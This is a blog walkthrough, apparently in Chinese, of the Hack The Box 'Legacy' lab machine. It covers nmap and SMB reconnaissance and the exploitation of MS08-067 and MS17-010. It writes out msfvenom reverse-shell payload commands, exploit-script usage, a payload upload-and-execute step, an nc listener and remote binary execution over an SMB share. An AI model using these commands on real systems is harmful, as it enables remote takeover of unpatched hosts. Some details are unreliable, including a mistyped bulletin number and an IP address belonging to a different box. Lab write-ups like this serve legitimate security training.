HTB靶场系列 Windows靶机 Legacy靶机

HTB靶场系列 Windows靶机 Legacy靶机勘探 常规nmap扫描 445smb 查看一下共享文件夹共享了什么文件 先用smbmap看一下,关于smb我近期会放出一个使用指南,敬请关注 发现两种方式都被拒绝了访问 Vuln 发现暴漏了ms08-

本文已参与「新人创作礼」活动,一起开启掘金创作之路

勘探

常规nmap扫描

root@kali# nmap 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:30 EST 
Nmap scan report for 10.10.10.4                                
Host is up (0.018s latency).
Not shown: 65532 filtered ports                                                                   
PORT     STATE  SERVICE                                        
139/tcp  open   netbios-ssn    
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server
                                       
Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds

root@kali# nmap -sU -p- --min-rate 10000 -oA nmap/alludp 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 20:34 EST
Nmap scan report for 10.10.10.4                               
Host is up (0.019s latency).
Not shown: 65534 open|filtered ports
PORT    STATE SERVICE                                                
137/udp open  netbios-ns                                                                        
                   
Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds

root@kali# nmap -sC -sV -p 139,445 -oA nmap/scripts 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:37 EST
Nmap scan report for 10.10.10.4
Host is up (0.019s latency).

PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h08m26s, deviation: 1h24m51s, median: -5h08m26s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b2:7b:09 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-02-19T17:29:16+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 257.42 seconds

445smb

查看一下共享文件夹共享了什么文件

先用smbmap看一下,关于smb我近期会放出一个使用指南,敬请关注

root@kali# smbmap -H 10.10.10.4
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.4...
[+] IP: 10.10.10.4:445  Name: 10.10.10.4
        Disk                                                    Permissions
        ----                                                    -----------
[!] Access Denied

root@kali# smbclient -N -L //10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER

发现两种方式都被拒绝了访问

Vuln

nmap -p 445 --script vuln 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-19 13:27 EST
Nmap scan report for 10.10.10.4
Host is up (0.018s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.49 seconds

发现暴漏了ms08-076和ms17-010两个非常有名的漏洞

然后msf打就是了手动之后咱们在研究

bin最近不好使了,找不到exp,百度又不让搜

还有一件事就是msf不能自动匹配target需要手动选择target,我试到第六个成功了target为win xp sp3 language:english

就这样

获取system权限

MS08-067

利用pocraw.githubusercontent.com/jivoi/pente…

在他这个脚本中详细的记载了这个脚本的利用方法,我在这里进行一个翻译

首先用msfvenom编写一个后门

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows

然后需要猜测一个对方系统的版本

 print '\nUsage: %s <target ip> <os #> <Port #>\n' % sys.argv[0]
                print 'Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445'
                print 'Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)'
                print 'Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal'
                print 'Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English'
                print 'Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)'
                print 'Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)'
                print 'Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)'
                print '' print 'FYI: nmap has a good OS discovery script that pairs well with this exploit:'
                print 'nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1'
                

这里它提示了我们可以用nmap来猜测系统版本,但是在我们之前的勘探中没有发现对方系统的版本,那么我们只能进行猜测,答案是参数六,也就是系统版本Windows XP SP3 English (NX)

那么进行脚本利用

root@kali# python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################

$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

记得打开nmap接收shell

root@kali# python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################

$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

搞定

MS17-010

不多赘述,流程和我在blue中写的完全一样,想考oscp的朋友我建议不要使用msf,而是用我在blue中的手动方法

手动

使用一个python脚本GitHub – helviojunior/MS17-010: MS17-010

这个脚本我就利用那个send_and_execute.py这个脚本来上传我们的回连脚本

 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f exe -o backdoor.exe

这样创建一个

python send_and_execute.py 10.10.10.40 backdoor.exe

然后用python执行

最后打开nc监听就好

nc -lvnp 4444

这里我直接复制粘贴了

后渗透

有一点需要提及就是xp文件系统和win7之后的系统有一点不一样

用户文件在根目录的一个叫Document and 什么的文件夹里,希望不要到时候找不到desktop

然后大部分我们熟知的命令在xp中是不能打的,比如说whoami,我们可以用smb共享一个出去

root@kali# smbserver.py a /usr/share/windows-binaries/
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

这样

然后在主机中

C:\WINDOWS\system32>\10.10.14.14\a\whoami.exe
NT AUTHORITY\SYSTEM

\

今天的文章HTB靶场系列 Windows靶机 Legacy靶机分享到此就结束了,感谢您的阅读。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/21835.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注